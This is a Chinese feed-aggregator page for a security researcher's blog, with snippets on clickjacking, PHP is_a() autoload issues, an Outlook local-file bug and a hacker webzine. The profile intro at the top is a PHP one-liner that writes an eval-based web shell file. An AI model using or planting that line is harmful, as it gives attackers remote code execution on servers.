简介：<?fputs(fopen('heige.php','w+'),'<?php @eval($_POST[c])? >');?> MSN:SuperHei@ph4nt0m.org GTalk:5up3rh3i@gmail.com

原站：http://hi.baidu.com/hi%5Fheige

标签：5up3rh3iblog

指数：

“5up3rh3i'blog［提供有偿web代码安全审计服务］”的内容更新

累计：221 篇（自 2009-07-10 起）

更新：约2篇/周，最后更新9 天前

5up3rh3i'blog［提供有偿web代码安全审计服务］

PSTZine_0x06_Introduction

introduction by superhei 坚持是一个永久的话题，在上一期的introduction里开头是这样一句话“曾经迷茫，曾经一度想放弃，但最终我们坚持了下来。”，然而我们的坚持最终遗留下了一个空白的2011年，在这一年了我们没有了webzine，没有了planet，有的只是少许的技术博客及一些8挂的微博。 我们还能坚持多久？我们在重复着xfocus、灰色轨迹、小榕论坛的道路，我们在慢慢消失... 很多... (9 天前)

http://inezha.com/w/03bk8w8p

5up3rh3i'blog［提供有偿web代码安全审计服务］

求职

准备辞职转行。寻找一个看得上我的boss或者创业伙伴...只是目前有个要求就是可以在家里工作，待遇要求不高。 类别：默认分类 查看评论... (53 天前)

http://inezha.com/w/evyct88h

5up3rh3i'blog［提供有偿web代码安全审计服务］

Inertia-Clickjacking

首先说明inertia这个单词我是用google翻译得到的“惯性”的意思，如果有不妥的，还请指正！！google的大牛 michal zalewski为了配合他的新书《the tangled web》，最近更新了一系列关于猥琐流的blog，其中有一blog《x-frame-options, or solving the wrong problem》提到一个关于x-frame-options没有办法防御的一种clickjacking攻击方式。poc:http://lcamtuf.coredump.cx/clickit/很... (63 天前)

http://inezha.com/w/r5rqh88m

5up3rh3i'blog［提供有偿web代码安全审计服务］

Hello Android！！

欢迎各大androider加入指导..... 类别：默认分类 查看评论... (132 天前)

http://inezha.com/w/nxbb088u

5up3rh3i'blog［提供有偿web代码安全审计服务］

再谈漏洞

很高兴阿里的文学青年之一的大风又开始写blog了，写blog分享技术的都是好青年。文学青年就是有激情，饭都可以不吃忙着写blog一下就是n篇，其中《关于php的is_a()函数执行代码的问题》《谁来为漏洞买单？》都是与php的is_a()有关的。“对于is_a()调用__autoload()导致的安全问题”是不是php的is_a()的漏洞？在大风文章里可以看得出来，他是认为是php的漏洞，只是说得比较“和谐”[不... (139 天前)

http://inezha.com/w/98yhz88t

5up3rh3i'blog［提供有偿web代码安全审计服务］

outlook一个诡异的东西

http://www.80vul.com/outlook/outlook.pdf 那个读本地文件的就是我常说的“我测试环境可以，其他人不行”的典型，问题报告给ms后，得到反馈结果是他们一样的测试环境却重现不了..... 类别：默认分类 查看评论... (152 天前)

http://inezha.com/w/bridn880

5up3rh3i'blog［提供有偿web代码安全审计服务］

《WEB代码审计与渗透测试》

《web代码审计与渗透测试》 类别：默认分类 查看评论... (152 天前)

http://inezha.com/w/tg71888o

订阅者 ( 3 )